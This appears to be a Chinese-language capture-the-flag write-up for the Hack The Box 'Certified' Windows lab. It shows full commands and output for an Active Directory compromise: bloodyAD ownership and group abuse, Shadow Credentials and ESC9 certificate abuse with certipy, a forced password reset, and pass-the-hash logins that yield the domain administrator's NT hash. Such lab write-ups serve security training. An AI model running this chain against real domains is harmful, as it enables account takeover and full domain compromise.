Certified
Machine Information
As is common in Windows pentests, you will start the Certified box with credentials for the following account: Username: judith.mader Password: judith09
1. User
1.1. 信息收集
1.1.1. 端口扫描
┌──(root㉿kali)-[~/Desktop/htb/Certified]
└─# nmap 10.10.11.41 -p- --min-rate 10000
Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-06 09:23 EDT
Nmap scan report for 10.10.11.41
Host is up (0.066s latency).
Not shown: 65516 filtered tcp ports (no-response)
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5985/tcp open wsman
9389/tcp open adws
49667/tcp open unknown
49689/tcp open unknown
49690/tcp open unknown
49691/tcp open unknown
49717/tcp open unknown
49726/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 26.63 seconds
┌──(root㉿kali)-[~/Desktop/htb/Certified]
└─# nmap 10.10.11.41 -p 53,88,135,139,389,445,464,593,636,3268,3269,5985,9389 -sCV
Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-06 09:25 EDT
Nmap scan report for 10.10.11.41
Host is up (0.068s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-08-06 20:01:36Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:DC01.certified.htb, DNS:certified.htb, DNS:CERTIFIED
| Not valid before: 2025-06-11T21:04:20
|_Not valid after: 2105-05-23T21:04:20
|_ssl-date: 2025-08-06T20:03:02+00:00; +6h35m51s from scanner time.
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:DC01.certified.htb, DNS:certified.htb, DNS:CERTIFIED
| Not valid before: 2025-06-11T21:04:20
|_Not valid after: 2105-05-23T21:04:20
|_ssl-date: 2025-08-06T20:03:01+00:00; +6h35m52s from scanner time.
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-08-06T20:03:02+00:00; +6h35m51s from scanner time.
| ssl-cert: Subject:
| Subject Alternative Name: DNS:DC01.certified.htb, DNS:certified.htb, DNS:CERTIFIED
| Not valid before: 2025-06-11T21:04:20
|_Not valid after: 2105-05-23T21:04:20
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-08-06T20:03:01+00:00; +6h35m52s from scanner time.
| ssl-cert: Subject:
| Subject Alternative Name: DNS:DC01.certified.htb, DNS:certified.htb, DNS:CERTIFIED
| Not valid before: 2025-06-11T21:04:20
|_Not valid after: 2105-05-23T21:04:20
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open mc-nmf .NET Message Framing
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2025-08-06T20:02:24
|_ start_date: N/A
|_clock-skew: mean: 6h35m51s, deviation: 0s, median: 6h35m50s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 99.40 seconds
1.1.2. 初始凭证
nxc smb certified.htb -u judith.mader -p judith09
1.1.3. smb
nxc smb certified.htb -u judith.mader -p judith09 --shares
1.1.4. users
┌──(root㉿kali)-[~/Desktop/htb/Certified]
└─# nxc smb certified.htb -u judith.mader -p judith09 --users
SMB 10.10.11.41 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:certified.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.41 445 DC01 [+] certified.htb\judith.mader:judith09
SMB 10.10.11.41 445 DC01 -Username- -Last PW Set- -BadPW- -Description-
SMB 10.10.11.41 445 DC01 Administrator 2024-05-13 14:53:16 0 Built-in account for administering the computer/domain
SMB 10.10.11.41 445 DC01 Guest <never> 0 Built-in account for guest access to the computer/domain
SMB 10.10.11.41 445 DC01 krbtgt 2024-05-13 15:02:51 0 Key Distribution Center Service Account
SMB 10.10.11.41 445 DC01 judith.mader 2024-05-14 19:22:11 0
SMB 10.10.11.41 445 DC01 management_svc 2024-05-13 15:30:51 0
SMB 10.10.11.41 445 DC01 ca_operator 2024-05-13 15:32:03 0
SMB 10.10.11.41 445 DC01 alexander.huges 2024-05-14 16:39:08 0
SMB 10.10.11.41 445 DC01 harry.wilson 2024-05-14 16:39:37 0
SMB 10.10.11.41 445 DC01 gregory.cameron 2024-05-14 16:40:05 0
SMB 10.10.11.41 445 DC01 [*] Enumerated 9 local users: CERTIFIED
1.1.5. bloodhound
大致路径
- 添加
JUDITH.MADER用户到MANAGEMENT组 - 利用 Shadow Credentials 获取
MANAGEMENT_SVC用户权限 MANAGEMENT_SVC用户 WINRM登录
别问怎么来的,你打多了就懂了
1.2. WriteOwner
┌──(root㉿kali)-[~/Desktop/htb/Certified]
└─# bloodyAD --host dc01.certified.htb -d certified.htb -u 'judith.mader' -p judith09 set owner MANAGEMENT 'JUDITH.MADER'
[+] Old owner S-1-5-21-729746778-2675978091-3820388244-512 is now replaced by JUDITH.MADER on MANAGEMENT
┌──(root㉿kali)-[~/Desktop/htb/Certified]
└─# bloodyAD --host dc01.certified.htb -d certified.htb -u 'judith.mader' -p judith09 add genericAll MANAGEMENT 'JUDITH.MADER'
[+] JUDITH.MADER has now GenericAll on MANAGEMENT
加组
┌──(root㉿kali)-[~/Desktop/htb/Certified]
└─# bloodyAD --host dc01.certified.htb -d certified.htb -u 'judith.mader' -p judith09 add groupMember MANAGEMENT 'JUDITH.MADER'
[+] JUDITH.MADER added to MANAGEMENT
校验一下
加成了
1.3. Shadow Credentials
certipy-ad shadow auto -username 'judith.mader@certified.htb' -p 'judith09' -account 'MANAGEMENT_SVC' -dc-ip 10.10.11.41
┌──(root㉿kali)-[~/Desktop/htb/Certified]
└─# certipy-ad shadow auto -username 'judith.mader@certified.htb' -p 'judith09' -account 'MANAGEMENT_SVC' -dc-ip 10.10.11.41
Certipy v5.0.2 - by Oliver Lyak (ly4k)
[*] Targeting user 'management_svc'
[*] Generating certificate
[*] Certificate generated
[*] Generating Key Credential
[*] Key Credential generated with DeviceID '92a9ee13-b5e6-3bef-8d61-5e0f02e9965d'
[*] Adding Key Credential with device ID '92a9ee13-b5e6-3bef-8d61-5e0f02e9965d' to the Key Credentials for 'management_svc'
[*] Successfully added Key Credential with device ID '92a9ee13-b5e6-3bef-8d61-5e0f02e9965d' to the Key Credentials for 'management_svc'
[*] Authenticating as 'management_svc' with the certificate
[*] Certificate identities:
[*] No identities found in this certificate
[*] Using principal: 'management_svc@certified.htb'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'management_svc.ccache'
[*] Wrote credential cache to 'management_svc.ccache'
[*] Trying to retrieve NT hash for 'management_svc'
[*] Restoring the old Key Credentials for 'management_svc'
[*] Successfully restored the old Key Credentials for 'management_svc'
[*] NT hash for 'management_svc': a091c1832bcdd4677c28b5a6a1295584
验证一下
1.4. WINRM
evil-winrm -i dc01.certified.htb -u management_svc -H a091c1832bcdd4677c28b5a6a1295584
2. System
2.1. ForceChangePassword
改下 CA_OPERATOR 的密码
┌──(root㉿kali)-[~/Desktop/htb/Certified]
└─# bloodyAD --host dc01.certified.htb -d certified.htb -u 'management_svc' -p :a091c1832bcdd4677c28b5a6a1295584 set password CA_OPERATOR Admin123!
[+] Password changed successfully!
验证一下
2.2. ESC9
题目叫这个,那说明多半就是这个洞
使用 certipy 枚举一下证书漏洞
┌──(root㉿kali)-[~/Desktop/htb/Certified]
└─# certipy find -u 'CA_OPERATOR@certified.htb' -p 'Admin123!' -dc-ip '10.10.11.41' -vulnerable -stdout
Certipy v5.0.3 - by Oliver Lyak (ly4k)
[*] Finding certificate templates
[*] Found 34 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
[*] Finding issuance policies
[*] Found 15 issuance policies
[*] Found 0 OIDs linked to templates
[*] Retrieving CA configuration for 'certified-DC01-CA' via RRP
[*] Successfully retrieved CA configuration for 'certified-DC01-CA'
[*] Checking web enrollment for CA 'certified-DC01-CA' @ 'DC01.certified.htb'
[!] Error checking web enrollment: timed out
[!] Use -debug to print a stacktrace
[!] Error checking web enrollment: timed out
[!] Use -debug to print a stacktrace
[*] Enumeration output:
Certificate Authorities
0
CA Name : certified-DC01-CA
DNS Name : DC01.certified.htb
Certificate Subject : CN=certified-DC01-CA, DC=certified, DC=htb
Certificate Serial Number : 36472F2C180FBB9B4983AD4D60CD5A9D
Certificate Validity Start : 2024-05-13 15:33:41+00:00
Certificate Validity End : 2124-05-13 15:43:41+00:00
Web Enrollment
HTTP
Enabled : False
HTTPS
Enabled : False
User Specified SAN : Disabled
Request Disposition : Issue
Enforce Encryption for Requests : Enabled
Active Policy : CertificateAuthority_MicrosoftDefault.Policy
Permissions
Owner : CERTIFIED.HTB\Administrators
Access Rights
ManageCa : CERTIFIED.HTB\Administrators
CERTIFIED.HTB\Domain Admins
CERTIFIED.HTB\Enterprise Admins
ManageCertificates : CERTIFIED.HTB\Administrators
CERTIFIED.HTB\Domain Admins
CERTIFIED.HTB\Enterprise Admins
Enroll : CERTIFIED.HTB\Authenticated Users
Certificate Templates
0
Template Name : CertifiedAuthentication
Display Name : Certified Authentication
Certificate Authorities : certified-DC01-CA
Enabled : True
Client Authentication : True
Enrollment Agent : False
Any Purpose : False
Enrollee Supplies Subject : False
Certificate Name Flag : SubjectAltRequireUpn
SubjectRequireDirectoryPath
Enrollment Flag : PublishToDs
AutoEnrollment
NoSecurityExtension
Extended Key Usage : Server Authentication
Client Authentication
Requires Manager Approval : False
Requires Key Archival : False
Authorized Signatures Required : 0
Schema Version : 2
Validity Period : 1000 years
Renewal Period : 6 weeks
Minimum RSA Key Length : 2048
Template Created : 2024-05-13T15:48:52+00:00
Template Last Modified : 2024-05-13T15:55:20+00:00
Permissions
Enrollment Permissions
Enrollment Rights : CERTIFIED.HTB\operator ca
CERTIFIED.HTB\Domain Admins
CERTIFIED.HTB\Enterprise Admins
Object Control Permissions
Owner : CERTIFIED.HTB\Administrator
Full Control Principals : CERTIFIED.HTB\Domain Admins
CERTIFIED.HTB\Enterprise Admins
Write Owner Principals : CERTIFIED.HTB\Domain Admins
CERTIFIED.HTB\Enterprise Admins
Write Dacl Principals : CERTIFIED.HTB\Domain Admins
CERTIFIED.HTB\Enterprise Admins
Write Property Enroll : CERTIFIED.HTB\Domain Admins
CERTIFIED.HTB\Enterprise Admins
[+] User Enrollable Principals : CERTIFIED.HTB\operator ca
[!] Vulnerabilities
`ESC9` : Template has no security extension.
[*] Remarks
`ESC9` : Other prerequisites may be required for this to be exploitable. See the wiki for more details.
检测出存在 ESC9 漏洞
1:将 ca_operator 的 UPN 更新为目标管理员的 sAMAccountName
┌──(root㉿kali)-[~/Desktop/htb/Certified]
└─# certipy account -u management_svc -hashes :a091c1832bcdd4677c28b5a6a1295584 -dc-ip 10.10.11.41 -user ca_operator -upn Administrator update
Certipy v5.0.3 - by Oliver Lyak (ly4k)
[*] Updating user 'ca_operator':
userPrincipalName : Administrator
[*] Successfully updated 'ca_operator'
2:以 ca_operator 用户身份从 ESC9 模板申请证书
┌──(root㉿kali)-[~/Desktop/htb/Certified]
└─# certipy req \
-dc-ip '10.10.11.41' -u 'ca_operator' -p 'Admin123!'\
-target 'dc01.certified.htb' -ca 'certified-DC01-CA' \
-template 'CertifiedAuthentication'
Certipy v5.0.3 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[*] Request ID is 4
[*] Successfully requested certificate
[*] Got certificate with UPN 'Administrator'
[*] Certificate has no object SID
[*] Try using -sid to set the object SID or see the wiki for more details
[*] Saving certificate and private key to 'administrator.pfx'
[*] Wrote certificate and private key to 'administrator.pfx'
3:恢复 ca_operator 帐户的 UPN
┌──(root㉿kali)-[~/Desktop/htb/Certified]
└─# certipy account -u 'management_svc' -hashes ':a091c1832bcdd4677c28b5a6a1295584' -user 'ca_operator' -upn 'ca_operator@certified.htb' -dc-ip '10.10.11.41' update
Certipy v5.0.3 - by Oliver Lyak (ly4k)
[*] Updating user 'ca_operator':
userPrincipalName : ca_operator@certified.htb
[*] Successfully updated 'ca_operator'
4:以目标管理员身份进行身份验证
┌──(root㉿kali)-[~/Desktop/htb/Certified]
└─# certipy account -u 'management_svc' -hashes ':a091c1832bcdd4677c28b5a6a1295584' -user 'ca_operator' -upn 'ca_operator@certified.htb' -dc-ip '10.10.11.41' update
Certipy v5.0.3 - by Oliver Lyak (ly4k)
[*] Updating user 'ca_operator':
userPrincipalName : ca_operator@certified.htb
[*] Successfully updated 'ca_operator'
┌──(root㉿kali)-[~/Desktop/htb/Certified]
└─# certipy auth \
-dc-ip '10.10.11.41' -pfx 'administrator.pfx' \
-username 'administrator' -domain 'certified.htb'
Certipy v5.0.3 - by Oliver Lyak (ly4k)
[*] Certificate identities:
[*] SAN UPN: 'Administrator'
[*] Using principal: 'administrator@certified.htb'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'administrator.ccache'
[*] Wrote credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@certified.htb': aad3b435b51404eeaad3b435b51404ee:0d5b49608bbce1751f708748f67e2d34
2.3. PTH
evil-winrm -i dc01.certified.htb -u administrator -H 0d5b49608bbce1751f708748f67e2d34
